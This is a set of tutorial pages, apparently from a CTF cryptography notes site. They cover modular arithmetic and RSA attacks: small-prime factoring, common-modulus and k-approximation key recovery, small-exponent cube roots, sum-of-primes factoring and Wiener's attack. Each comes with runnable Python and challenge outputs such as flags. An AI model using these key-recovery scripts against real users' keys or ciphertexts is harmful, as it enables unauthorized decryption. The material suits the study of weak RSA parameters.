148 | x \equiv a^{-1} [n]
149 | $$
150 | 
151 | It may be efficiently computed by solving *Bézout's equation* `a * x + n * k = 1` using the Extended Euclidean algorithm (used to compute the GCD - Greatest common divisor).
152 | 
153 | ### Practical example
154 | 
155 | $$
156 | 5 \times x \equiv 1 [34]
157 | $$
158 | 
159 | $$
160 | 5 \times x = 1 + 34 \times k
161 | $$
162 | 
163 | $$
164 | 1 = 5 \times 7 - 34
165 | $$
166 | 
167 | 
168 | You can use the modular inverse in Python :
169 | 
170 | $$
171 | 5 \equiv x^{-1} [34]
172 | $$
173 | 
174 | ```python
175 | >>> pow(5, -1, 34)
176 | 7
177 | >>> from Crypto.Util.number import inverse
178 | >>> inverse(5, 34)
179 | 7
180 | >>> from gmpy2 import invert
181 | >>> invert(5, 34)
182 | mpz(7)
183 | ```


--------------------------------------------------------------------------------
/docs/crypto/modular-arithmetic/02-quadratic-residue.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Quadratic residue
  3 | description: Introduction to Quadratic residue in modular arithmetic.
  4 | ---
  5 | 
  6 | # Quadractic residues
  7 | 
  8 | ## Introduction
  9 | 
 10 | An integer `a` is a quadratic residue modulo `n`, if there exists an integer `x` such that : 
 11 | 
 12 | $$
 13 | x^2 \equiv a \pmod{n}
 14 | $$
 15 | 
 16 | ## Legendre symbol
 17 | 
 18 | The **Legendre symbol** is a multiplicative function that returns (`p` must be an odd prime number):
 19 | 
 20 | - **1** : `a` is a quadratic residue and `a ≢ 0 mod p`.
 21 | - **-1** : `a` is a quadratic non-residue `mod p`.
 22 | - **0** : `a ≡ 0 mod p`
 23 | 
 24 | ```python
 25 | from Crypto.Util.number import isPrime
 26 | 
 27 | 
 28 | def legendre_symbol(a, p):
 29 |     assert isPrime(p) and p % 2 == 1, "'p' must be a prime odd"
 30 |     res = pow(a, (p - 1) // 2, p)
 31 |     return res - p if res > 1 else res
 32 | 
 33 | 
 34 | print(legendre_symbol(a=12, p=839)) # 12 ≢ 0 mod 839
 35 | print(legendre_symbol(a=2, p=5))
 36 | print(legendre_symbol(a=5, p=5)) # 5 ≡ 0 mod 5
 37 | ```
 38 | 
 39 | ```
 40 | 1
 41 | -1
 42 | 0
 43 | ```
 44 | 
 45 | ## Modular square root
 46 | 
 47 | ### The modulus is congruent to 3 modulo 4
 48 | 
 49 | If :
 50 | 
 51 | $$
 52 | p \equiv 3 \pmod{4}
 53 | $$
 54 | 
 55 | So :
 56 | 
 57 | $$
 58 | x \equiv \pm a^{(p + 1) / 4} \pmod{p}
 59 | $$
 60 | 
 61 | Example :
 62 | 
 63 | $$
 64 | x^2 \equiv 4 \pmod{19}
 65 | $$
 66 | 
 67 | ```python
 68 | # Check if a solution exists with legendre symbol
 69 | >>> legendre_symbol(4, 19) == 1
 70 | True
 71 | 
 72 | >>> 19 % 4 == 3
 73 | True
 74 | 
 75 | >>> pow(4, (19 + 1) // 4, 19)
 76 | 17 # x = 17
 77 | >>> 17 ** 2 % 19 == 4
 78 | True
 79 | >>> (-17) ** 2 % 19 == 4
 80 | True
 81 | ```
 82 | 
 83 | ### The modulus is congruent to 5 modulo 8
 84 | 
 85 | If :
 86 | 
 87 | $$
 88 | p \equiv 5 \pmod{8}
 89 | $$
 90 | 
 91 | So :
 92 | 
 93 | $$
 94 | v = (2a)^{(p - 5) / 8} \pmod{p}
 95 | $$
 96 | $$
 97 | i = 2av^2 \pmod{p}
 98 | $$
 99 | $$
100 | x \equiv \pm av(i - 1) \pmod{p}
101 | $$
102 | 
103 | Example :
104 | 
105 | $$
106 | x^2 \equiv 51 \pmod{85}
107 | $$
108 | 
109 | ```python
110 | from Crypto.Util.number import isPrime
111 | 
112 | 
113 | def legendre_symbol(a, p):
114 |     res = pow(a, (p - 1) // 2, p)
115 |     return res - p if res > 1 else res
116 | 
117 | 
118 | def square_root_modulo(a, p):
119 |     if isPrime(p) and p % 2 == 1:
120 |         if legendre_symbol(a, p) == -1:
121 |             return None, None
122 | 
123 |     if p % 4 == 3:
124 |         x = pow(a, (p + 1) // 4, p)
125 |         return -x, x
126 | 
127 |     if p % 8 == 5:
128 |         v = pow(2 * a, (p - 5) // 8, p)
129 |         i = 2 * a * v ** 2 % p
130 |         x = a * v * (i -1) % p
131 |         return -x, x
132 |     return None, None
133 | 
134 | 
135 | a = 51
136 | p = 85
137 | print(f"x^2 = {a} [{p}]") 
138 | print(square_root_modulo(a, p))
139 | ```
140 | 
141 | Output :
142 | 
143 | ```
144 | x^2 = 51 [85]
145 | (-34, 34)
146 | ```
147 | 
148 | ### The modulus is a prime number
149 | 
150 | You can use the Tonelli-Shanks algorithm.
151 | 
152 | ```python
153 | def legendre(a, p):
154 |     return pow(a, (p - 1) // 2, p)
155 |  
156 | def tonelli(n, p):
157 |     assert legendre(n, p) == 1, "not a square (mod p)"
158 |     q = p - 1
159 |     s = 0
160 |     while q % 2 == 0:
161 |         q //= 2
162 |         s += 1
163 |     if s == 1:
164 |         return pow(n, (p + 1) // 4, p)
165 |     for z in range(2, p):
166 |         if p - 1 == legendre(z, p):
167 |             break
168 |     c = pow(z, q, p)
169 |     r = pow(n, (q + 1) // 2, p)
170 |     t = pow(n, q, p)
171 |     m = s
172 |     t2 = 0
173 |     while (t - 1) % p != 0:
174 |         t2 = (t * t) % p
175 |         for i in range(1, m):
176 |             if (t2 - 1) % p == 0:
177 |                 break
178 |             t2 = (t2 * t2) % p
179 |         b = pow(c, 1 << (m - i - 1), p)
180 |         r = (r * b) % p
181 |         c = (b * b) % p
182 |         t = (t * c) % p
183 |         m = i
184 |     return r
185 | 
186 | a, p = 48807038706356516327835928540, 588522524122640355249739913363 
187 | print(f"x^2 = {a} [{p}]") 
188 | print(tonelli(a, p))
189 | ```
190 | 
191 | Output :
192 | 
193 | ```
194 | x^2 = 48807038706356516327835928540 [588522524122640355249739913363]
195 | 2502859248593759290
196 | ```


--------------------------------------------------------------------------------
/docs/crypto/modular-arithmetic/05-chinese-remainder-theorem.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Chinese remainder theorem
 3 | description: Chinese remainder theorem
 4 | ---
 5 | 
 6 | # Chinese remainder theorem
 7 | 
 8 | ## Introduction
 9 | 
10 | The **Chinese remainder theorem** states that if one knows the remainders of the Euclidean division of an integer `n` by several integers, then one can determine uniquely the remainder of the division of `n` by the product of these integers, under the condition that the divisors are pairwise coprime (no two divisors share a common factor other than 1).
11 | 
12 | More information on [Wikipedia](https://en.wikipedia.org/wiki/Chinese_remainder_theorem) and [brilliant.org](https://brilliant.org/wiki/chinese-remainder-theorem/).
13 | 
14 | ## Maths example
15 | 
16 | For example, if we know that the remainder of `n` divided by 3 is 2, the remainder of `n` divided by 5 is 3, and the remainder of `n` divided by 7 is 2, then without knowing the value of `n`, we can determine that the remainder of `n` divided by 105 (the product of 3, 5, and 7) is 23. Importantly, this tells us that if `n` is a natural number less than 105, then 23 is the only possible value of `n`.
17 | 
18 | Let's solve this system :
19 | 
20 | $$
21 | x \equiv 2 [3]
22 | $$
23 | $$
24 | x \equiv 3 [5]
25 | $$
26 | $$
27 | x \equiv 2 [7]
28 | $$
29 | 
30 | Or :
31 | 
32 | $$
33 | x = 7 \times j_{1} + 2
34 | $$
35 | $$
36 | x = 5 \times j_{2} + 3
37 | $$
38 | $$
39 | x = 3 \times j_{3} + 2
40 | $$
41 | 
42 | Let's solve the first equation :
43 | 
44 | $$
45 | 7 \times j_{1} + 2 \equiv 3 [5]
46 | $$
47 | $$
48 | 7 \times j_{1} \equiv 1 [5]
49 | $$
50 | $$
51 | j_{1} \equiv 3[5]
52 | $$
53 | $$
54 | j_{1} = k_{1} \times 5 + 3
55 | $$
56 | 
57 | We can inject `j1` :
58 | 
59 | $$
60 | x = 7 \times (k_{1} \times 5 + 3) + 2
61 | $$
62 | $$
63 | x = 35 \times k_{1} + 23
64 | $$
65 | 
66 | Let's solve the last equation :
67 | 
68 | $$
69 | 35 \times k_{1} + 23 \equiv 2 [3]
70 | $$
71 | $$
72 | k_{1} \equiv 0 [3]
73 | $$
74 | $$
75 | k_{1} = 3 \times l
76 | $$
77 | 
78 | We can inject `k1` :
79 | 
80 | $$
81 | x = 35 \times (3 \times l) + 23
82 | $$
83 | $$
84 | x = 105 \times l + 23
85 | $$
86 | $$
87 | x = 23 [105]
88 | $$
89 | 
90 | In conclusion :
91 | 
92 | $$
93 | x = 23\ \text{if}\ x < 105
94 | $$
95 | $$
96 | x \equiv 23 [105] \text{ otherwise}
97 | $$


--------------------------------------------------------------------------------
/docs/crypto/rsa/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to RSA
 3 | description: Introduction to RSA.
 4 | ---
 5 | 
 6 | # RSA
 7 | 
 8 | **RSA** (**Rivest–Shamir–Adleman**) is a public-key cryptosystem that is widely used for secure data transmission.
 9 | 
10 | The strength of RSA relies on the fact that you need to factor `n` to obtain `d` and there is no known algorithm that can do that efficiently for large numbers.
11 | 
12 | ## Introduction
13 | 
14 | RSA is an **asymmetric** cipher. The **public key** contains `n` and `e`, `pubKey(n, e)`, and the **private key** contains `n` and `d`, `privKey(n, d)`.
15 | 
16 | - `p` and `q` are two large random primes that validate the following equation :
17 | 
18 | $$
19 | n = p * q
20 | $$
21 | 
22 | -  Euler’s totient function :
23 | $$
24 | \varphi(n)=(p - 1)(q - 1)
25 | $$
26 | 
27 | - `e` (public key exponent) must verify :
28 | 
29 | $$
30 | 1 < e < \varphi(n)
31 | $$
32 | $$
33 | gcd(e, \varphi(n)) = 1
34 | $$
35 | $$
36 | d * e \equiv 1 [\varphi(n))]
37 | $$
38 | $$
39 | d \equiv invmod(e) [\varphi(n))]
40 | $$
41 | 
42 | - `m` (plaintext) must verify (otherwise it will be trim by the modulus) :
43 | 
44 | $$
45 | m < n
46 | $$
47 | 
48 | !!! info
49 | 	Greatest common divisor (**GCD**) of two integers is the largest positive integer that divides each of the integers.
50 | 
51 | ## Encryption (public key)
52 | 
53 | - `c` : ciphertext (encrypted message, the result of calculation)
54 | - `m` : cleartext (plain message to send)
55 | - `e` : exponent (from public key)
56 | - `n` : product of two large prime numbers (from public key)
57 | 
58 | $$
59 | c = m^e [n]
60 | $$
61 | 
62 | ## Decryption (private key)
63 | 
64 | - `c` : ciphertext (encrypted message, the result of calculation)
65 | - `m` : cleartext (plain message to send)
66 | - `n` : product of two large prime numbers (from public key)
67 | - `d` : exponent (from private key)
68 | 
69 | $$
70 | m \equiv c^d [n]
71 | $$
72 | 
73 | ## References
74 | 
75 | - https://bitsdeep.com/posts/attacking-rsa-for-fun-and-ctf-points-part-1/
76 | - https://en.wikipedia.org/wiki/RSA_(cryptosystem)


--------------------------------------------------------------------------------
/docs/crypto/rsa/02-small-prime.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Small primes
 3 | description: RSA - Attack on small prime.
 4 | ---
 5 | 
 6 | # Attack on small primes (p & q)
 7 | 
 8 | ## Introduction
 9 | 
10 | `d` (private exponent) can be calculated very easily if you know `φ(n)`. To calculate `φ(n)`, you need to find the two prime factors `p` and `q`.
11 | 
12 | $$
13 | n = p * q
14 | $$
15 | $$
16 | \varphi(n) = \varphi(pq) = (p - 1)(q - 1)
17 | $$
18 | $$
19 | d * e \equiv 1 [\varphi(n))]
20 | $$
21 | 
22 | If `n` is small (< 256 bits) you can bruteforce `p` and `q`, or you can use a well-known database like [factordb](http://factordb.com/) which contains a lot of factors.
23 | 
24 | ## Example
25 | 
26 | The victim generates a `pubKey(n, e)` and a `privKey(n, d)`, then encrypt a secret message.
27 | 
28 | Source code :
29 | 
30 | ```python
31 | from binascii import hexlify
32 | 
33 | m = int(hexlify(b"s3cr3t"), 16)
34 | 
35 | p, q = 5484631, 50601277
36 | n = p * q
37 | e = 65537
38 | 
39 | c = pow(m, e, n)
40 | 
41 | print("m =", m)
42 | print("n =", n)
43 | print("Encrypted =", c)
44 | ```
45 | 
46 | Output :
47 | 
48 | ```
49 | m = 126664548954996
50 | n = 277529332473787
51 | Encrypted = 189766109539025
52 | ```
53 | 
54 | ---
55 | 
56 | The attacker only have access to the victim's `pubKey(n, e)`. He will try to recover the victim's `privKey(n, d)` by factoring `n` with the help of `factordb`.
57 | 
58 | Source code :
59 | 
60 | ```python
61 | from Crypto.Util.number import long_to_bytes
62 | from factordb.factordb import FactorDB
63 | # python3 -m pip install pycryptodome factordb-python
64 | 
65 | 
66 | f = FactorDB(n)
67 | f.connect()
68 | factors = f.get_factor_from_api()
69 | 
70 | p, q = int(factors[0][0]), int(factors[1][0])
71 | phi_n = (p - 1) * (q - 1)
72 | d = pow(e, -1, phi_n)
73 | m = pow(c, d, n)
74 | 
75 | print("p =", p, ", q =", q)
76 | print("phi(n) =", phi_n)
77 | print("d =", d)
78 | print("m =", long_to_bytes(m))
79 | ```
80 | 
81 | Output :
82 | 
83 | ```
84 | p = 5484631 , q = 50601277
85 | phi(n) = 277529276387880
86 | d = 173465855145593
87 | m = b's3cr3t'
88 | ```
89 | 
90 | The attacker successfully recovers the `privKey(n, d)` and the plaintext message.


--------------------------------------------------------------------------------
/docs/crypto/rsa/03-same-modulus.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Same modulus - Bezout identity
  3 | description: RSA - Attack using same modulus.
  4 | ---
  5 | 
  6 | # Using same modulus (n)
  7 | 
  8 | ## Introduction
  9 | 
 10 | Alice and Bob encrypt the same message `m` (`c1` for Alice and `c2` for Bob).
 11 | 
 12 | The attacker intercepts the two encrypted messages `c1` and `c2` and the two public keys of Alice and Bob. Let's try to find the original message.
 13 | 
 14 | Alice : `pubKey1(n, e1)` and `privKey1(n, d1)`<br>
 15 | Bob : `pubKey2(n, e2)` and `privKey2(n, d2)`
 16 | 
 17 | ### Prerequisites
 18 | 
 19 | - We have `c1` and `c2` which are two encrypted messages from `pubKey1` and `pubKey2`.
 20 | - `pubKey1` and `pubKey2` have the same modulus `n` (`n1` = `n2`), however `e1`, `e2`, `d1` and `d2` can differ.
 21 | - `c1` and `c2` comes from the same cleartext `m`.
 22 | 
 23 | ### Maths
 24 | 
 25 | Basic RSA :
 26 | 
 27 | $$
 28 | c_{1} \equiv m^{e_{1}} [n]
 29 | $$
 30 | $$
 31 | c_{2} \equiv m^{e_{2}} [n]
 32 | $$
 33 | 
 34 | Bezout's identity :
 35 | 
 36 | $$
 37 | gcd(e_{1}, e_{2}) == 1
 38 | $$
 39 | $$
 40 | e_{1} * u + e_{2} * v = 1
 41 | $$
 42 | 
 43 | Try to make something to the power of `e1 * u + e2 * v` :
 44 | 
 45 | $$
 46 | c_{1}^u \equiv (m^{ e_{1} })^u \equiv m^{ {e_{1} } \times u} [n]
 47 | $$
 48 | 
 49 | $$
 50 | c_{2}^v \equiv (m^{ e_{2} })^v \equiv m^{ {e_{2} } \times v} [n]
 51 | $$
 52 | 
 53 | $$
 54 | m^{ {e_{1}} \times u } \times m^{ {e_{2} } \times v } \equiv m^{ {e_{1}} \times u + {e_{2}} \times v} \equiv m^1 \equiv m[n]
 55 | $$
 56 | 
 57 | Conclusion :
 58 | 
 59 | $$
 60 | c_{1}^u \times c_{2}^v \equiv m[n]
 61 | $$
 62 | 
 63 | ## Example
 64 | 
 65 | ### Encryption using same modulus
 66 | 
 67 | Source code :
 68 | 
 69 | ```python
 70 | from Crypto.Util.number import bytes_to_long
 71 | 
 72 | m = bytes_to_long(b"S3CR3T!!!")
 73 | print("Plaintext (hex) =", m)
 74 | 
 75 | # Alice (1) and Bob (2)
 76 | n = 262680224351198943558562962102931091165978396557063906345939
 77 | e_1, e_2 = 65537, 34352
 78 | 
 79 | c_1 = pow(m, e_1, n)
 80 | c_2 = pow(m, e_2, n)
 81 | print("Encrypted (c1) =", c_1)
 82 | print("Encrypted (c2) =", c_2)
 83 | ```
 84 | 
 85 | Output :
 86 | 
 87 | ```
 88 | Plaintext (hex) = 1534773644617674989857
 89 | Encrypted (c1) = 188774664250657377040945189723460943665792254753522168336372
 90 | Encrypted (c2) = 183884636824805796552562064524263351724174474778356736863748
 91 | ```
 92 | 
 93 | ### Decryption with
 94 | 
 95 | - `pubKey1(n, e1)` and `pubKey2(n, e2)`
 96 | - `c1` and `c2`
 97 | 
 98 | Source code :
 99 | 
100 | ```python
101 | from Crypto.Util.number import long_to_bytes
102 | 
103 | def bezout(a, b):
104 |     if b == 0:
105 |         return 1, 0
106 |     else:
107 |         q, r = a // b, a % b
108 |         x, y = bezout(b, r)
109 |         return y, x - q * y
110 | 
111 | u, v = bezout(e_1, e_2)
112 | assert e_1 * u + e_2 * v == 1
113 | 
114 | cleartext = pow(c_1, u, n) * pow(c_2, v, n) % n
115 | print("Cleartext :", long_to_bytes(cleartext).decode())
116 | ```
117 | 
118 | Output :
119 | 
120 | ```
121 | Cleartext : S3CR3T!!!
122 | ```


--------------------------------------------------------------------------------
/docs/crypto/rsa/04-k-approximation.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Same modulus - k approximation
 3 | description: RSA - Using same modulus.
 4 | ---
 5 | 
 6 | # Same modulus - k approximation
 7 | 
 8 | ## Introduction
 9 | 
10 | Find the private key of another user, if you have a private and a public key with the same modulus than him.
11 | 
12 | ### Prerequisites
13 | 
14 | - `pubKey1(n, e1)` and `privKey1(n, d1)`
15 | - `pubKey2(n, e2)`
16 | 
17 | The goal is to find : `privKey2(n, d2)`
18 | 
19 | ### Maths
20 | 
21 | $$e * d \equiv 1 [\phi(n)]$$
22 | 
23 | So, with `𝑘 ∈ ℤ` :
24 | 
25 | $$
26 | e * d - 1 = k * \phi(n)
27 | $$
28 | 
29 | If you know `k`, you can calcultate `phi(n)` :
30 | 
31 | $$
32 | \phi(n) = \frac{(e * d - 1)}{k}
33 | $$
34 | 
35 | To calculate `k`, you can approximate :
36 | 
37 | $$
38 | \phi(n) \approx n
39 | $$
40 | $$
41 | (p - 1) * (q - 1) \approx p * q
42 | $$
43 | 
44 | So :
45 | 
46 | $$
47 | k = \frac{(e * d - 1)}{\phi(n)}
48 | $$
49 | 
50 | $$
51 | k \approx \frac{(e * d - 1)}{n}
52 | $$
53 | 
54 | Now, you can come back and calculate `phi(n)` :
55 | 
56 | $$
57 | \phi(n) = \frac{(e * d - 1)}{k}
58 | $$
59 | 
60 | You can verify your calcul by using this formula :
61 | 
62 | $$
63 | e * d - 1 = k * \phi(n)
64 | $$
65 | 
66 | If the result is not correct, you need to add 1 to `k` and retry it. It is because of the approximation.
67 | 
68 | ## Example
69 | 
70 | Source code :
71 | 
72 | ```python
73 | e_1 = 0x10001
74 | e_2 = 491
75 | n = 211231128460542766584141422369
76 | d_1 = 6043278848032645765057870973
77 | 
78 | tmp_k = (d_1 * e_1 - 1) // n
79 | tmp_phi_n = (d_1 * e_1 - 1) // tmp_k
80 | 
81 | while tmp_phi_n * tmp_k != (e_1 * d_1) - 1:
82 |     tmp_k += 1
83 |     tmp_phi_n = (d_1 * e_1 - 1) // tmp_k
84 | 
85 | phi_n = tmp_phi_n
86 | print("phi(n) :", phi_n)
87 | d_2 = pow(e_2, -1, phi_n)
88 | print("d_2 :", d_2)
89 | ```
90 | 
91 | Output :
92 | 
93 | ```
94 | phi(n) : 211231128460541602935785434644
95 | d_2 : 84750574962783494456924094959
96 | ```


--------------------------------------------------------------------------------
/docs/crypto/rsa/05-small-exponent.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Very small exponent
 3 | description: RSA - Attack using small exponent
 4 | ---
 5 | 
 6 | # Attack on a very small public exponent (e)
 7 | 
 8 | ## Introduction
 9 | 
10 | For encryption, `rsa` uses :
11 | 
12 | $$
13 | c = m^e [n]
14 | $$
15 | 
16 | If `e` is very small, you can do a root of n-th degree on `c` to find `m`.
17 | 
18 | ## Example
19 | 
20 | > Write-up for the challenge `BreizhCTF2023` from `BreizhCTF 2022`.
21 | 
22 | We have two files, a `ciphertext` and a `public key`.
23 | 
24 | ```bash
25 | $ ls
26 | position.enc  pubkey.pem
27 | $ base64 -w 0 position.enc
28 | BHUhTDufM2B4OmG88bkKeydszUC70enM+3TqBuuGRUw/hDHlnLCxavTP66ZeB1xGoikaahuhVOoPjLPeOtyBnu33s0mJCuwNVLJk2AAOiodduWDBakhl%
29 | $ cat pubkey.pem
30 | -----BEGIN PUBLIC KEY-----
31 | MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKCAQB58ZBK8WsDP7sySY3CoyK9
32 | Z4W2E3/nME2zePjXD28L9WcBzGMucmSZBNsC1fwxzrHaIPZ9EgGfAwyrTWFoprWb
33 | 03jf9NzTh38Y9xQ1l05L7J1RbW87v2qvNAvi94y0PJ2n8nE6oeRDfBLWCIzb/Bmv
34 | QX5LCk6GwMW4az3H3JEH3RT1feLFGjnxDDysrPRmVkEr6KiewmSIW43Djdg2+RMR
35 | zvLI/o79iPmYO2fA2qGf73OlrcGwDq2VeA5v49ytxbCIbb50oj1JMftCNLNm+Q03
36 | urdgAvcijncqriBZyHs7/2KdS+8gyXnOPH+1MLnvSCJu6WUqkKGf284DzTtiDE7t
37 | AgED
38 | -----END PUBLIC KEY-----
39 | ```
40 | 
41 | The public exponent is 3, to find the cleartext message we can do the third root of the ciphertext.
42 | 
43 | Source code :
44 | 
45 | ```python
46 | from Crypto.PublicKey import RSA
47 | from Crypto.Util.number import long_to_bytes, bytes_to_long 
48 | from gmpy2 import iroot
49 | from base64 import b64decode
50 | 
51 | 
52 | pub_key = """-----BEGIN PUBLIC KEY-----
53 | MIIBHzANBgkqhkiG9w0BAQEFAAOCAQwAMIIBBwKCAQB58ZBK8WsDP7sySY3CoyK9
54 | Z4W2E3/nME2zePjXD28L9WcBzGMucmSZBNsC1fwxzrHaIPZ9EgGfAwyrTWFoprWb
55 | 03jf9NzTh38Y9xQ1l05L7J1RbW87v2qvNAvi94y0PJ2n8nE6oeRDfBLWCIzb/Bmv
56 | QX5LCk6GwMW4az3H3JEH3RT1feLFGjnxDDysrPRmVkEr6KiewmSIW43Djdg2+RMR
57 | zvLI/o79iPmYO2fA2qGf73OlrcGwDq2VeA5v49ytxbCIbb50oj1JMftCNLNm+Q03
58 | urdgAvcijncqriBZyHs7/2KdS+8gyXnOPH+1MLnvSCJu6WUqkKGf284DzTtiDE7t
59 | AgED
60 | -----END PUBLIC KEY-----"""
61 | ciphertext = b64decode("BHUhTDufM2B4OmG88bkKeydszUC70enM+3TqBuuGRUw/hDHlnLCxavTP66ZeB1xGoikaahuhVOoPjLPeOtyBnu33s0mJCuwNVLJk2AAOiodduWDBakhl")
62 | 
63 | rsa_pub_key = RSA.import_key(pub_key)
64 | print("e =", rsa_pub_key.e)
65 | 
66 | c = bytes_to_long(ciphertext)
67 | print("c =", c)
68 | 
69 | m, success = iroot(c, rsa_pub_key.e)
70 | if success:
71 |     print("m =", long_to_bytes(m))
72 | ```
73 | 
74 | Output :
75 | 
76 | ```
77 | e = 3
78 | c = 5724429365887192937975880152728551254971364525753671743693147523302441587707804097718439038173546355026701325414799056205074425733698744528930791075004105312923906122185518441456605039101517459937804505729125
79 | m = b'BZHCTF{sur3m3nt_3n_fr4nc3_!!}'
80 | ```


--------------------------------------------------------------------------------
/docs/crypto/rsa/06-sum-of-primes.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Sum of primes
 3 | description: RSA - Sum of primes
 4 | ---
 5 | 
 6 | # Sum of primes
 7 | 
 8 | ## Introduction
 9 | 
10 | We have :
11 | 
12 | - `n` : modulus
13 | - `e` : public exponent
14 | - `c` : ciphertext
15 | 
16 | Additionally, we have a **special variable** :
17 | 
18 | - `x` : sum of `p` and `q`
19 | 
20 | The goal is to find the cleartext.
21 | 
22 | ## Maths
23 | 
24 | We know that :
25 | 
26 | $$n = p * q$$
27 | $$x = p + q$$
28 | 
29 | Let's try to do something with it :
30 | 
31 | $$p = x - q$$
32 | 
33 | $$n = (x - q) * q$$
34 | 
35 | $$n = -q^2 + x \times q$$
36 | 
37 | $$-q^2 + x \times q - n = 0$$
38 | 
39 | We have a second degree equation, let's solve it :
40 | 
41 | $$delta = x^2 - 4 \times (-1) \times (-n)$$
42 | 
43 | $$p = \frac{- x + \sqrt{delta}}{2 * -1}$$
44 | $$q = \frac{- x - \sqrt{delta}}{2 * -1}$$
45 | 
46 | ## Example
47 | 
48 | > Write-up for the challenge `Sum-O-Primes` from `picoCTF 2022`.
49 | 
50 | Source code :
51 | 
52 | ```python
53 | from gmpy2 import isqrt
54 | from Crypto.Util.number import long_to_bytes
55 | 
56 | 
57 | x = 0x198e800b4f9e29e69889bc7a42b92dbd764cb22dbeb5fb81b1d9778bfe8c4b85d08a7f990019d537b6856aa1ff7355d0bef66c0a5c954bb4b7e58ac094c42ac1c23d23f8f763e41bbebdfa985505ab3571f8355290d2ca66ac333c4e30f1b7354c37d67db2c13c7e07ca3b6d98283f5042a55e23796ca227f428e0d3a83057510
58 | n = 0xa0ab034d978fdd92e73f3f7536f4f2ff5f4dee70b5f1d319903ec65f2a8ffe729688452d2c1f25a7c330e6bb532580094196f888a20ba7556f0907d8a4884bddbde4c4361582fcf163799a0f49b9d196b32012e1b5a4dabd2a6c9e9a47173f903ae1ebe2db66ebf55471982d52e6cbeb8060dd0f01d950a30ac5a830ad2414c86f97703717752bd20abb528f7738e010a7c3e8116b2c3a6706d900d83ff4afc7ca8b47f6c19d1de00c7ea8666c617a5e33d600b381b263662ad17a5d4262a819a57b357fee702538355ee7723f9c694a3c98999bc2432658c7798119d7a54d5e4c01447c7afcdf36110be0be195cea0828b17f5e86b4702341e7a37babb3db07
59 | c = 0x497f4e814e3d7093d49c33c9b743748455b82496af6a8900e6d3c899b58a5e8d32fde34dccf882a87859d8508a18fe23088c8b58dd33decb3e9f4c1737c85f0b66114e62efe0da72fcee95619e4d76e7c485f161464f7067237bbcc213bd02b5e2816208333146652395e07f4245dfd654755417d35cc0a27933dd48ab219f31ed73820087c1ec7e2150caf4f5f0de052d14a2e492715e3a3ca24de41240d49494532b4d5fa54c59db08c6d94938f33a489c24a9b4a7d6b2d57164ce7aacdd0707302fded17671d197485c764064ed97d2560274b5ed4994446e8f790e16e05e8dd4b2d39e228a715f70bd012eb7eaec65e67734fad95f55be307e26b2106226
60 | e = 65537
61 | 
62 | delta = x ** 2 - 4 * (-1) * (-n)
63 | d_sqrt = isqrt(delta)
64 | 
65 | p = (- x + d_sqrt) // -2
66 | q = (- x - d_sqrt) // -2
67 | 
68 | phi_n = (p - 1) * (q - 1)
69 | d = pow(e, -1, phi_n)
70 | print("d =", d)
71 | 
72 | m = pow(c, d, n)
73 | print("m =", long_to_bytes(m))
74 | ```
75 | 
76 | Output :
77 | 
78 | ```
79 | d = 1127439399893923133912707628369838645619413486081153868194322549263430464271487628166920090846284414060674923759835122712920275782145638815730909265745188866694498218417163612150327863917168285069522800442880578146452984443358315535368229409369978855340777181509567431540796668618072436317237316896508417951624330920268227424920546346184610507679335002930594105592638984054398797689679876059800971426371265461357943025665418837577601422699946107705988452212001703843148158300307727551909739089351035197873956373620030322437138163639780814925877499529967026959027228892716485664996757386343014299196168286140987346985
80 | m = b'picoCTF{ee326097}'
81 | ```


--------------------------------------------------------------------------------
/docs/crypto/rsa/07-wiener-attack.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Wiener's attack
 3 | description: RSA - Wiener's attack
 4 | ---
 5 | 
 6 | # Wiener's attack
 7 | 
 8 | ## Introduction
 9 | 
10 | Wiener's attack uses the continued fraction method to expose the private key `d` when `d` is small. 
11 | 
12 | This attack is efficient when :
13 | 
14 | $$
15 | d < \frac{1}{3}n^{\frac{1}{4}}
16 | $$
17 | 
18 | More information on [Wikipedia](https://en.wikipedia.org/wiki/Wiener%27s_attack).
19 | 
20 | ## Example
21 | 
22 | > Write-up for the challenge `Dachshund Attacks` from `picoCTF 2021`.
23 | 
24 | Source code :
25 | 
26 | ```python
27 | from Crypto.Util.number import long_to_bytes
28 | from gmpy2 import isqrt
29 | 
30 | 
31 | e = 66485515700027508124393462603307250283285433560589922749953846584350319445057850434378385036858864936995624416301155250283854028492295775511806815870240769834283989221116776654053682452967999953321125454046763105962086775969986855276743946578863359050058645755209508360174125889513337651751635233993709763703
32 | n = 106774728126681627939368333568146834748954381924140339429116948705200702583783883904569812973644885904232513676261931492637265097244025465493777677546902927256074232367594502950952251233351032491901485509039965967881313865964941445996219261211676996512756521494649034694180698160424747599765303636899244093939
33 | c = 21075635593431678989011904902132950778533759954604574660679053586128486625762466272222388215969770744892460903083833191261052513118155531928194905031407223419187697073366363016199725047126814786760696773849427861901117730666287515235847725694816508840449318490150711326048955427608080691090808616180851365681
34 | 
35 | 
36 | def continued_fraction(n, d):
37 |     if d == 0:
38 |         return []
39 |     q = n // d
40 |     r = n - q * d
41 |     return [q] + continued_fraction(d, r)
42 | 
43 | 
44 | def convergents(n, d):
45 |     hh, kk, h, k = 0, 1, 1, 0
46 |     for x in continued_fraction(n, d):
47 |         hh, kk, h, k = h, k, h * x + hh, k * x + kk
48 |         yield h, k
49 | 
50 | 
51 | def find_p_q(e, n):
52 |     p, q = 0, 0
53 |     for k, d in convergents(e, n):
54 |         if k != 0:
55 |             phi_n = (e * d - 1) // k
56 |             a, b, c = 1, n - phi_n + 1, n
57 |             delta = pow(b, 2) - 4 * a * c
58 |             if delta >= 0:
59 |                 s1 = (-b + isqrt(delta)) // 2 * a
60 |                 s2 = (-b - isqrt(delta)) // 2 * a
61 |                 if n == s1 * s2:
62 |                     return abs(s1), abs(s2)
63 |     return -1, -1
64 | 
65 | 
66 | p, q = find_p_q(e, n)
67 | print("p =", p)
68 | print("q =", q)
69 | phi_n = (p - 1) * (q - 1)
70 | d = pow(e, -1, phi_n)
71 | m = pow(c, d, n)
72 | 
73 | print("m =", long_to_bytes(m))
74 | ```
75 | 
